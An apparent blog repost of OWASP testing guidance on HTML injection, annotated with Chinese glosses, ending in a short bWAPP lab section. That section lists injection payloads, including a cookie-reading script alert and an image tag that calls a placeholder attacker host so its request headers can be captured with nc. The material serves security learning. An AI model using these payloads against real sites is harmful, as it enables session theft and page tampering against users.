zoukankan      html  css  js  c++  java
  • OWASP 之 HTML Injection

    Summary

      HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary(任意) HTML code into a vulnerable web page. This vulnerability can have many consequences(后果), like disclosure of a user's session cookies that could be used to impersonate(模仿) the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

      This vulnerability occurs when the user input is not correctly sanitized(消毒) and the output is not encoded. An injection allows the attacker to send a malicious(恶毒) HTML page to a victim. The targeted browser will not be able to distinguish (trust) the legit(合法) from the malicious parts and consequently will parse and execute all as legit in the victim context.

    How to Test

      There is a wide range of methods and attributes that could be used to render HTML content. If these methods are provided with an untrusted input, then there is an high risk of XSS, specifically an HTML injection one. Malicious HTML code could be injected for example via(通过) innerHTML, that is used to render user inserted HTML code. If strings are not correctly sanitized the problem could lead to XSS based HTML injection. Another method could be document.write().

    Test in BWAPP

      

    输入html代码:<h1><b><u>Click Me ! Boy<u></b><h1>  

    输入脚本:<script>alert(document.cookie)</script>

    nc弹个headers:<img src="http://attackerIP/blah">

    恶补NC去了,更多利用稍后更新。。。。

  • 相关阅读:
    openjump遇到的一些问题
    kettle安装教程/安装失败
    C# string和byte[]数组之间相互转换
    C# 各种进制转换
    C#AE创建FeatureDataset/创建数据、集要素集
    ArcCatalog/arcgis怎么连接postgresql/postpis
    梦断代码阅读笔记03
    体温冲刺完成
    体温冲刺
    体温作业
  • 原文地址:https://www.cnblogs.com/peterpan0707007/p/7295004.html
Copyright © 2011-2022 走看看